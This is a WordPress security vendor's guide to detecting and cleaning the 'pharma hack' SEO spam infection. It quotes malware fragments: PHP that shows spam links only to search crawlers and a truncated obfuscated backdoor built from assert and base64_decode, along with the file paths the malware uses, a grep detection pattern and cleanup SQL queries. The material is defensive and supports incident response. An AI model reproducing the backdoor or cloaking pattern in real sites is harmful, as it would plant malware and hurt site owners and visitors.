Table of Contents [TOC]
Is your wordpress site littered with casino pharma links?
Is your index.php files infected with malicious spam pharma hack?
Key Takeaways
Pharma hack has evolved a lot in 2024 and so the steps to fix it.
Recently, a variant known as the “casino pharma hack” has emerged, combining elements of both casino and pharmaceutical spam, further complicating the threat landscape. Understanding these evolving threats is crucial for implementing effective security measures to protect your website’s integrity and maintain its search engine visibility. This black hat seo exploit was destroying their SEO rankings by targeting the Google SERPs, due to which their website was blacklisted by Google and started showing ““This Site May Be Hacked” message in Google.
In this article you will learn more about What is WordPress pharma hack? & how to find and remove Pharma Hack from wordpress site by cleaning up the database and infected files.
The WordPress Pharma Hack, also known as the “Google Viagra Hack,” is a malicious attack targeting WordPress websites. Attackers exploit vulnerabilities to inject spammy content or links promoting pharmaceutical products like Viagra or Cialis into your site’s pages and search engine results. This not only damages your website’s reputation but also adversely affects its search engine rankings. Recently, a variant known as the “casino pharma hack” has emerged, combining elements of both casino and pharmaceutical spam, further complicating the threat landscape. Understanding these evolving threats is crucial for implementing effective security measures to protect your website’s integrity and maintain its search engine visibility. In 2024, we have seen increased instances of this kind of hack on WordPress sites as compared to 2023.
This web exploit is categorised under blackhat SEO spam and is mostly targeted towards small business websites. Other hacks which come under same category includes: Gibberish Keywords Hack, Japanese Keywords Spam & WordPress malware redirect.
The below is a cached version of an infected page.
Google SERP results produced by a pharma hack example:
In a recent incident, a WordPress site was compromised by a self-replicating malware that generated spam doorway pages. The malicious file, wp-page.php
, was identified and deleted. However, upon reloading the site, the spam content persisted, indicating the file had regenerated. This behavior is characteristic of malware employing cron jobs to reinfect sites. Interestingly, no suspicious cron jobs were found in the user’s crontab.
Further investigation uncovered a malicious nav.php
file within the active theme directory. This file was responsible for recreating wp-page.php
and injecting its links into legitimate site pages when accessed by search engine crawlers like Googlebot or Bingbot. The nav.php
file was included in the theme’s header.php
, ensuring its execution with every page load. Removing both nav.php
and its reference in header.php
effectively eliminated the spam content from the site.
...$movedb = user_min_browser($_SERVER['HTTP_USER_AGENT']);$movedb2 = 'moved';if ($movedb == $movedb2){ echo '<ul>';echo '<li><a href="http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_1.'">http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_1.'</a></li>';echo '<li><a href="http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_2.'">http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_2.'</a></li>';...echo '<li><a href="http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_20.'">http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_20.'</a></li>';echo '</ul>';}
Upon discovering the persistent regeneration of the malicious wp-page.php
file, a deeper investigation was initiated to identify the underlying cause. It was found that the nav.php
file, not originally part of the theme, was being executed through a deliberate inclusion in the header.php
file. The following line of code was inserted into header.php
:
This inclusion ensured that nav.php
was executed each time a public page was loaded, facilitating the reinjection of spam content and the recreation of wp-page.php
. This method acted as a “delete protection” mechanism, allowing the malware to persist despite removal attempts.
This incident underscores the necessity for comprehensive security measures beyond superficial scans. Website owners must conduct thorough inspections to detect and eliminate hidden threats such as unauthorized file inclusions, backdoors, and other vulnerabilities.
Due to strict regulations, many pharmaceutical products like Viagra, Nexium, and Cialis cannot be promoted through conventional online advertising channels. To circumvent these restrictions, malicious actors exploit high-ranking websites by injecting spammy links and content related to these products. Their goal is to leverage the authority and visibility of compromised sites to promote their offerings illicitly.
Detection Challenges
Detecting the Pharma Hack can be challenging because:
Wondering about How To Tell If Your Site is Hacked with The Pharma Hack, Well, this is one of the most important step of removing pharma hack spam from your WordPress website. Go through the below mentioned ways in order to identify the infection.
You can use free malware scanners for scanning your website. We have also developed our own tool specifically for this purpose.
User-Agent Emulation:
We recommend the User-Agent Switcher tool .
For Chrome: https://chrome.google.com/webstore/detail/user-agent-switcher/dbclpoekepcmadpkeaelmhiheolhjflj?hl=en
For Firefox :https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/
Now retrieve one or more of the pages of your site and look for anything ‘different’ or out of place.If nothing is immediately apparent – view the source of your pages.
Usually this option is available by right clicking in the page and selecting ‘View source’ from the context sensitive popup menu. If the option isn’t there – try right clicking on a different (empty) part of the page.
In particular check the following areas of the page’s
– check the text between the two tags – look for any words that don’t belong
– look at the text between the quotes following the content= part of the meta description text
By now you have either found something or you haven’t.
One final check is to search this html source code for a select few words that should not ordinarily be found within the page.
You can use the ‘Fetch as Googlebot’ option within Google Webmaster Tools. Check the output code after the page is fetched and rendered.
Google Search Test:
site:yourdomain.com viagra
or inurl:yourdomain.com cialis
.site:yourdomain.com (viagra|cialis|regalis|payday|blackjack|holdem|porn)
In a pharma hack, the backdoors keep regenerating every time we remove them. Therefore, If the backdoors are regenerating, this might be due to malware that uses cron jobs to reinfect sites, so check the user’s crontab.
If you don’t find any cron job there,the hacker must have injected a backdoor which is leading to the recreation of infection on the website. To Identify the Regenerating Script check out if the file content was adding wp-page.php to legitimate site pages whenever a request was made by Googlebot or Bingbot.
Appending wp-page.php to legitimate requests isn’t the real problem; the actual problem is the regeneration of the file. For those unfamiliar with how themes work, if any include is added in the header file, it keeps loading the wp-page.php file every time the theme will be loaded by the visitors.
The hacker injected this line into header.php to make the malicious code execute every time a public website page was requested. This is mainly done to send the spam to search engine crawlers, but it also recreates the wp-page.php as a “delete protection” feature.
Basically, the hack consists of two parts—malicious files in the WordPress plugins folder coupled with encrypted code in the WordPress database. The files in the plugins folder contain code that runs the encrypted code stored in the database. Because of this, the pharma hack is dependent upon these rogue files in the plugins folder.
Typically, hack files contain easily-identifiable PHP functions like eval()
and base64_decode()
, and although the pharma hack is no exception, there’s one major difference. With the pharma hack, these functions are stored in the WordPress database as strings, and they’re encoded backwards! At runtime, a hack file in the plugins folder pulls these strings from the database, flips ’em, and then runs ’em as functions, and that’s how the deed gets done.
Also Read – How To Fix eval(base64_decode()) Php Hack in WordPress [Guide]
Most of the time, malicious content ( in the form of code) is encoded to look like legitimate WordPress files and are injected to the plugin folder.If there are any files other than the default files available with your original WordPress plugin install should be looked at closely, since they could be hack files.
The malicious code sends Google with requests for the list of highest ranking pages on your website. It then stores this information in its database, and targets them when it runs.
The pharma hack has various undetectable WordPress backdoors that let the hacker regain the access to your website:
If you fix one of the three, but forget about the rest, you’ll most likely be reinfected and the spam will continue to be indexed.
Also Read – WordPress Brute Force Attack Prevention
Generally, attackers hunt for vulnerable WordPress installations i.e sites using an old version of WordPress, vulnerable plugins, and themes, security loopholes or hosting multiple websites on the same account using free wordpress scanners. This leads to the very first step to inject the backdoors into a compromised site.
When the backdoor is added, it is not immediately executed. Sometimes it stays for months without even getting called. The common places for these backdoors are:
wp-content/uploads/.*php (random PHP name file) wp-includes/images/smilies/icon_smile_old.php.xl wp-includes/wp-db-class.php wp-includes/images/wp-img.php |
???? Also Read – How to Scan Malware in WordPress Themes
In the pharma attack, these files have backdoor in the form of following piece of code:
< ? php $XZKsyG='as';$RqoaUO='e';$ygDOEJ=$XZKsyG.'s'.$RqoaUO.'r'.'t';$joEDdb ='b'.$XZKsyG.$RqoaUO.(64).'_'.'d'.$RqoaUO.'c'.'o'.'d'.$RqoaUO;@$ygDOEJ(@$j oEDdb('ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY... (long long string).. |
However, it is still calling eval(base64_decode but it is using variables that makes it hard to detect. In fact, none of the WordPress security plugins are able to find it. Therefore, look for such a string in your WordPress folders:
php $[a-zA-Z]*=’as’;
If you do an inspection of the code, you will see that it scans for the wp-config.php file and gets the database information. Hence, it will act as a remote shell and retrieves a lot of information about the system. That’s the first thing you have to remove before you do anything else.
If you don’t, you may allow hackers to reinfect your site via a backdoor or unpatched security hole. Reinfection may happen within seconds or it may take days before the malware returns, causing another stressful situation.
As always, we recommend you to update your WordPress instance to the latest version. This goes for all of your plugins, themes, etc. WordPress is typically very secure, it’s when you’re running old versions and out of date plugins/themes that run into trouble.
???? Also Read – How to Backup WordPress Database Manually?
For WordPress site owners, there are several reliable free WordPress security plugins that monitor the integrity of core files and theme files. But if you find yourself in a position where you feel attackers are injecting spam in your web pages or SERPs, know that we’re here to help.☎️
Now the next step of the attack is targeting compromised plugins and themes, that’s why WordPress Theme Security is very much important.. After successfully creating a backdoor into the system, a file will be created inside one of the existing plugins. Example:
akismet/wp-akismet.php akismet/db-akismet.php wp-pagenavi/db-pagenavi.php wp-pagenavi/class-pagenavi.php podpress/ext-podpess.php tweetmeme/ext-tweetmeme.php excerpt-editor/db-editor.php akismet/.akismet.cache.php akismet/.akismet.bak.php tweetmeme/.tweetmem.old.php |
They will target one or more old plugins using names like
wp-[plugin].php, db-[plugin].php, ext-[plugin].php, etc.
Look for for any plugin file with the wp_class_support string on it.
$ grep -r "wp_class_support" ./wp-content/plugins
Make sure you remove all those files and if required, remove all such plugins. To be 100% sure your plugins are clean, I would recommend removing all of them and reinstall again. (not possible for all sites, but this is probably the most secure way of doing it). Always keep them updated. ???? Also Read – WordPress .htaccess hacked – Cleanup & Prevention
This is the last step, and equally important. This is where the spam itself is hidden. They have been using the wp_options table with these names in the option_name:
wp-options -> class_generic_support wp-options -> widget_generic_support wp-options -> wp_check_hash wp-options -> rss_7988287cd8f4f531c6b94fbdbc4e1caf wp-options -> rss_d77ee8bfba87fa91cd91469a5ba5abea wp-options -> rss_552afe0001e673901a9f2caebdd3141d |
So, you need to clean these SQL queries from your database:
delete from wp_options where option_name = 'class_generic_support'; delete from wp_options where option_name = 'widget_generic_support'; delete from wp_options where option_name = 'fwp'; delete from wp_options where option_name = 'wp_check_hash'; delete from wp_options where option_name = 'ftp_credentials'; delete from wp_options where option_name = 'rss_7988287cd8f4f531c6b94fbdbc4e1caf'; delete from wp_options where option_name = 'rss_d77ee8bfba87fa91cd91469a5ba5abea'; delete from wp_options where option_name = 'rss_552afe0001e673901a9f2caebdd3141d'; |
Go through the steps given below in order to cleanse your site and ‘Remove pharma hack spam from wordpress website’.
There are two ways to clean pharma hack files from your WordPress website:
While manually cleaning files, you are making changes to your WordPress files. Unless you are a skilled developer, we’d urge you don’t choose manual removal of this hack. But if you have an experience with handling WordPress files and database, follow this procedure:
The manual WordPress pharma hack cleanup include two basic steps:
Firstly login to your web host and go to a page called cPanel. There you should find an option for File Manager. Select the File Manager.
This folder includes files of all the plugins installed in your WordPress site. The reason we recommend this particular folder to start with is because the plugins are the outdated plugins are the easiest targets to inject compromised files and thus hack a website.
Now, again go back to the cPanel. There you should find an option for phpMyAdmin. Open that folder.
In the database, select the wp_options table. It will allow you to browse through the table content. In the wp_options table, you’ll need to search for the following database entries:
class_generic_support wp_check_hash ftp_credentials widget_generic_support fwp rss_% (Delete all matches to rss_ expect, rss_excerpt_length, and rss_language)
Delete all those entries using this piece of code. And that’s it. Your site is now hack free. Before this, make sure you have taken full WordPress database backup and must know how to export WordPress database.
If you are unaware of how to handles wordpress files, using a security service is ideal. At Wp Hacked help you’d have to raise a ticket to clean your hacker site. Wp Hacked help is one of the best WordPress security services in the market that allows you to clean your site at the click of a button. Therefore, if you find yourself in a position where you feel attackers are injecting spam in your web pages or SERPs, just write to us.
Never skip these post pharma hack cleanup steps in order to reduce the risk of a reinfection and ensure that your website remains clean:
Enabling a valuable network security measure places a set of rules on incoming and outgoing traffic in order to protect networks, servers, websites, and individual computers. This website firewall acts as a wall between a trusted source (say, the server your WordPress website is hosted on) and an untrusted source (the internet) in which only trusted data is allowed entry.
Virtual Hardening & WAF ????️ How Does It Hardens WordPress?
If you are using WordPress, keep updating it to the latest version. Why? Because out-of-date software is the leading cause of infections. This also includes your plugins, themes, and any other extension type.
It is prudent to change the passwords related to your website: FTP, SFTP, cPanel, Plesk, WP-admin, etc. They could have been compromised and we do not want you to be reinfected because the attackers can still come back in through them. We recommend that you use a Password Manager, so you do not have to remember them all in your head.
How To Change Your Default WordPress Username password?
Also, update the password of your database. Keep a strong, unique and hard-to-guess password. Make sure you don’t use your name, spouse name or date of birth as the password for an integral part of your website. If you’re not familiar with handling changes in your database and configuration files, read our article.
In a lot of cases, we see that websites are compromised due to desktop malware that steals credentials. It’s why we always ask you take a minute to run an antivirus product.
How To Remove Malware From WordPress Site
After the site is clean and secure, a very good practice is to do regular backups. It reduces the chances of damage or risk of data loss to your website. Make sure to go through this WordPress site maintenance checklist to ensure smooth sailing.
For the most part, WordPress has been pretty solid in the security department. Security flaws are almost inevitable, but they’re usually caught early in the development stage. The fact is that when a malicious actor wants to infiltrate your website and he’s good enough at his craft, he’s probably going to succeed.